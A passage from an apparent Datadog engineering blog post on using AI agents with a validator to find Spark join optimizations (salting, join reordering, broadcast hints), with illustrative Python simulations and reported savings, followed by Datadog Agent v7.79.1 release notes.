The SQL plan showed a 65.5% skew ratio on a large join. Salting adds a random component to join keys so that rows for a hot key spread across more partitions. It's a well-known mitigation, but it can introduce overhead because the other side of the join has to be replicated once per salt value.

The agent and validator had a back-and-forth about this one. The agent correctly identified skew on the service-metrics join. The validator confirmed that this specific join was neither broadcast nor pre-partitioned, so skew was a real problem. The implementation was standard: add salt values to both sides of the join. The service side already held ~1TB in memory at that stage of execution.

Result: 24% reduction in executor time on that stage
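To make the salting idea concrete, here is a small pure-Python simulation. It is a sketch under stated assumptions rather than the job's Spark code: the key distribution, the partition count, the salt range, and the `partition_of` helper are all invented for illustration. One side of the join gets a random salt appended to each key, and the other side is replicated once per salt value so every salted key still finds its match.

```python
import random
import zlib
from collections import Counter

NUM_PARTITIONS = 8  # hypothetical shuffle partition count
NUM_SALTS = 8       # hypothetical salt range


def partition_of(key: str) -> int:
    """Deterministic stand-in for a hash partitioner."""
    return zlib.crc32(key.encode()) % NUM_PARTITIONS


def max_partition_share(keys: list[str]) -> float:
    """Fraction of all rows that land on the busiest partition."""
    loads = Counter(partition_of(key) for key in keys)
    return max(loads.values()) / len(keys)


rng = random.Random(0)

# Skewed left side: one hot key carries 70% of the rows (made-up distribution).
left = ["hot"] * 7000 + [f"k{i}" for i in range(3000)]
# Right side: one row per distinct key.
right = ["hot"] + [f"k{i}" for i in range(3000)]

# Left side: append a random salt to every key.
salted_left = [f"{key}#{rng.randrange(NUM_SALTS)}" for key in left]
# Right side: replicate each row once per salt value (this is the overhead).
salted_right = [f"{key}#{salt}" for key in right for salt in range(NUM_SALTS)]

# Every salted left key still has a matching row on the right.
right_index = set(salted_right)
assert all(key in right_index for key in salted_left)

unsalted_share = max_partition_share(left)
salted_share = max_partition_share(salted_left)
print(f"busiest partition, unsalted: {unsalted_share:.0%}")
print(f"busiest partition, salted:   {salted_share:.0%}")
```

The right side grows by a factor of `NUM_SALTS`, which is why salting only pays off when the skew is real, as the validator confirmed for this join.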

Optimization 2: Join reordering

The execution plan had a chain of joins where smaller intermediate results were being joined last, after building up massive datasets first. The agent suggested reordering to put smaller-cardinality joins earlier in the chain.

Here the validator was skeptical. It checked whether the join keys changed and whether reordering would trigger repartitions. Since these joins shared keys, reordering was safe.

Result: 15% reduction in overall execution time
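The effect of join order on intermediate size can be shown with a toy in-memory example. The tables, their sizes, and the `hash_join` helper below are invented for illustration and do not come from ServiceQueryEdge. All three tables share one join key, which mirrors the condition the validator checked.

```python
from collections import defaultdict


def hash_join(left: list[dict], right: list[dict], key: str) -> list[dict]:
    """Inner hash join of two lists of row dicts on a shared key."""
    index = defaultdict(list)
    for row in right:
        index[row[key]].append(row)
    return [{**l_row, **r_row} for l_row in left for r_row in index.get(l_row[key], [])]


# Made-up tables that all share the join key "id".
facts = [{"id": i % 100, "value": i} for i in range(10_000)]  # large
details = [{"id": i, "detail": f"d{i}"} for i in range(100)]  # medium
allowed = [{"id": i, "allowed": True} for i in range(5)]      # small and selective

# Order A: join the larger tables first, apply the selective join last.
a_step1 = hash_join(facts, details, "id")
a_final = hash_join(a_step1, allowed, "id")

# Order B: apply the selective, small-cardinality join first.
b_step1 = hash_join(facts, allowed, "id")
b_final = hash_join(b_step1, details, "id")

print(len(a_step1), len(b_step1))  # 10000 500
print(a_final == b_final)          # True: same result, smaller intermediate
```

Both orders return the same rows, but order B carries 500 intermediate rows into the second join instead of 10,000.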

Optimization 3: Broadcast hints

For one join involving a 500 MB mapping table, the agent recommended a broadcast hint to send the small side to all executors instead of shuffling both sides. The validator confirmed the size threshold was appropriate and the join type supported broadcasting.

Result: 8% reduction in executor time on that specific stage
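A rough cost model shows why broadcasting the small side can beat shuffling both sides. This is a deliberately simplified sketch: it counts only bytes moved over the network, and the size of the large side and the executor count are hypothetical. Only the 500 MB mapping table size comes from the text above.

```python
MB = 1024 ** 2


def shuffle_join_bytes(large_bytes: int, small_bytes: int) -> int:
    """Shuffle join, worst case: every row of both sides crosses the network."""
    return large_bytes + small_bytes


def broadcast_join_bytes(small_bytes: int, num_executors: int) -> int:
    """Broadcast join: each executor receives one full copy of the small side."""
    return small_bytes * num_executors


small = 500 * MB          # mapping table size mentioned above
large = 1024 * 1024 * MB  # hypothetical 1 TB large side
executors = 200           # hypothetical executor count

print(shuffle_join_bytes(large, small) // MB)        # 1049076
print(broadcast_join_bytes(small, executors) // MB)  # 100000
```

Under this model, broadcasting wins while the small side multiplied by the executor count stays below the combined size of both sides. Each executor also has to hold the broadcast table in memory, which is why the size check matters.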

Combined, these three changes cut daily infrastructure costs by 44% (from $1.5k to roughly $840) and reduced job runtime from 17 hours 20 minutes to about 7 hours in our largest data center. Other improvements came incrementally but summed meaningfully.
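The headline percentages follow directly from the before and after figures quoted above. The short check below uses only numbers from this post; `percent_reduction` is a helper name chosen for illustration.

```python
def percent_reduction(before: float, after: float) -> float:
    """Relative reduction from before to after, as a percentage (one decimal)."""
    return round((before - after) / before * 100, 1)


# Daily cost: $1.5k down to roughly $840.
cost_reduction = percent_reduction(1500, 840)

# Runtime in minutes: 17 h 20 min down to about 7 h.
runtime_reduction = percent_reduction(17 * 60 + 20, 7 * 60)

print(cost_reduction)     # 44.0
print(runtime_reduction)  # 59.6
```

The runtime figure rounds to the 60% reduction cited at the start of the post.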

What we learned

Data scope matters more than volume. At the beginning, we pumped massive amounts of trace data into the agent. It wasn't helping. Once we narrowed the scope to slow operators, stage metrics, and the surrounding code, suggestions became concrete and actionable.

Validation is essential. The biggest breakthrough came from adding a second agent to validate claims. Engineers spend a lot of time on rabbit holes chasing optimizations that don't help. A validator that reasons backward from "would this fix actually improve the metric?" saves that time.

Jobs Monitoring provides the critical context. SQL plans, stage metrics, and executor metrics are what let an agent make informed recommendations. Without them, an agent is guessing based on code patterns alone. With them, it can connect symptoms in the runtime to their causes in the codebase.

Agentic AI is most useful for the correlation work. We didn't use the agent to write optimized code. We used it to surface possibilities that the team then evaluated and refined. That's where the leverage is: finding the high-value problems and putting the right person in front of the data to solve them.

For organizations running large-scale Spark workloads, the combination of Jobs Monitoring and agentic AI can compress what would normally be hours or days of manual profiling and debugging into a workflow where an engineer stays focused on evaluation and impact.

If you're running Spark jobs and want to see bottlenecks the way we do, get started with Datadog's Data Observability or explore how Bits AI Agents can help with troubleshooting.

Datadog Agent · v7.79.1

Agent

Prelude

Released on: 2026-05-28

Security Notes
  • Bump github.com/prometheus/prometheus to v0.311.4 to address CVE-2026-42151 and CVE-2026-42154.
Bug Fixes
  • Windows: Fix CD-ROM drives being monitored by the disk check since Agent 7.73.0. The diskv2 check now uses the Windows GetDriveType() API to properly detect and exclude CD-ROM drives, matching the behavior of the previous Python disk check. This fixes false alerts on system.disk.in_use for CD-ROM drives with inserted media.
  • Fix a bug in the workload autoscaling controller where annotation-only edits (e.g. autoscaling.datadoghq.com/preview) on a locally-owned DatadogPodAutoscaler were not picked up until the next .spec change or cluster-agent restart, because the controller gated re-sync on .metadata.generation (which annotations do not bump). Toggling burstable mode via the preview annotation now takes effect on the next reconcile.
  • macOS: The Agent GUI app now ignores SIGPIPE to avoid process termination.
  • On macOS, preserve user customizations to system-probe.yaml across Agent upgrades.
  • Fixed a bug on Windows where the NPM TCP failure rate could exceed 100% and climb indefinitely.

Datadog Cluster Agent

Prelude

Released on: 2026-05-28
Pinned to datadog-agent v7.79.1: CHANGELOG.
